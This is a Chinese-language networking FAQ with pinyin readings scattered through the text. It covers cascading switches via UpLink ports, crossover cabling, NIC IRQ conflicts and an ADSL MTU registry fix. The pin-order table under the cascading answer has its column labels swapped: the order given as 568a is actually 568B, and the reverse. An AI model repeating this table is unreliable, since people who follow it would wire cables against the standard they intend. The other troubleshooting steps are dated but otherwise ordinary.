答(dá):UpLink口是交換機上(shàng)常見的一種端口,它是為(wèi)了便于兩台交換機之間(jiān)進行(xíng)級聯的端口。它與其相鄰的普通(tōng)UTP口使用的是同一通(tōng)道(dào),因而,如果使用了UpLink口,另一個(gè)與之相鄰的普通(tōng)端口就不能再使用了。這兩個(gè)端口稱為(wèi)共享端口,不能同時(shí)使用。級聯的時(shí)候,你(nǐ)可(kě)使用一般的網線(網線的兩端都遵循同一标準,即同是EIA/TIA 568A或568B)将一個(gè)交換機的普通(tōng)端口和(hé)另一個(gè)交換機的UpLink口連起來(lái)。如兩個(gè)設備都使用UpLink口連接,網線需要一端使用EIA/TIA 568A的标準,另一端使用EIA/TIA 568B的标準(如下表)。
标準568a 标準568b
橙白1 綠白1
橙2 綠2
綠白 3 橙白3
藍(lán)4 藍(lán)4
藍(lán)白5 藍(lán)白5
綠6 橙6
棕白7 棕白7
棕8 棕8
問:我在安裝網卡後,在“系統→設備管理(lǐ)器(qì)”中網卡出現黃色的“!”号,請(qǐng)問該如何解決?
答(dá):網卡較容易與其他設備發生(shēng)資源沖突,尤其是在系統中安裝有(yǒu)多(duō)個(gè)插卡的情況下,解決辦法是:
1、更換網卡在主闆插槽上(shàng)的位置是最好的解決辦法。
2、在該網卡“屬性”窗口“資源”标簽中找到“資源類型”列表,選定發生(shēng)沖突的“資源”,按“更改設置”按鈕,更改發生(shēng)沖突的IRQ中斷号或者I/O地址。
3、有(yǒu)些(xiē)PCI網卡會(huì)強行(xíng)占用IRQ10,與一些(xiē)強行(xíng)占用IRQ10的顯示卡發生(shēng)IRQ中斷沖突,如果遇到這種情況,可(kě)在BIOS中将“Assign IRQ For VGA”項設置為(wèi)Disabled,不給顯示卡分配固定的中斷。
4、運行(xíng)網卡附帶的軟盤中的設置程序,将網卡設置為(wèi)非PNP模式,設置IRQ中斷号和(hé)I/O地址為(wèi)系統未占用的地址;并在BIOS中将相應中斷号由PCI/ISA改為(wèi)Legacy ISA。
如果使用上(shàng)述方法均不能解決故障,建議換一塊網卡試試。
問:ADSL上(shàng)網網頁打不開(kāi)的問題?
答(dá):是MTU的問題!改一下注冊表!
HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Class/NetTrans/0000/主鍵下面建立字符串鍵名為(wèi)MaxMTU,鍵值為(wèi)1450